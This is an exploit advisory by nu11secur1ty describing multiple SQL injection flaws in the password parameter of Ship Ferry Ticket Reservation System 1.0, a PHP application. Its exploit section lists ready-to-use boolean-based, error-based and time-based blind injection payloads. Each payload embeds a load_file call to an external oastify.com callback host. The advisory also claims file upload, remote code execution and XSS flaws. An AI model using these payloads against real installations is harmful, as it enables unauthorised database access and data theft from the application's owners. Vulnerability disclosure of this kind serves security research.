Headline
Ship Ferry Ticket Reservation System 1.0 SQL Injection
Ship Ferry Ticket Reservation System version 1.0 suffers from multiple remote SQL injection vulnerabilities.
## Titles: SFTRS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi### Bonus: FU + RCE & XSS - Information disclosure## Author: nu11secur1ty## Date: 09/14/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `password` parameter appears to be vulnerable to SQL injection attacks.The payload '+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+' was submittedin the password parameter. This payload injects a SQL sub-query that callsMySQL's load_file function with a UNC file path that references a URL on anexternal domain. The application interacted with that domain, indicatingthat the injected SQL query was executed. The attacker can get all theinformation from the database of this system, and he can do very maliciousaction against the owner of this application!STATUS: HIGH- Vulnerability for deprecation!WARNING: DON'T USE ANY PRODUCTS FROM THIS VENDOR!https://github.com/oretnom23[+]Exploits:- SQLi Multiple:```mysql---Parameter: password (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') OR NOT9033=9033 AND ('ehPW'='ehPW Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR) Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT4905 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT(ELT(4905=4905,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zzCg'='zzCg Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT1493 FROM (SELECT(SLEEP(7)))tpHs) AND ('PbYw'='PbYw---```## Reproduce:[href](https://www.patreon.com/posts/sftrs-php-by-v1-112034018)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/09/sftrs-php-by-oretnom23-shipferry-ticket.html)## Time spent:00:17:00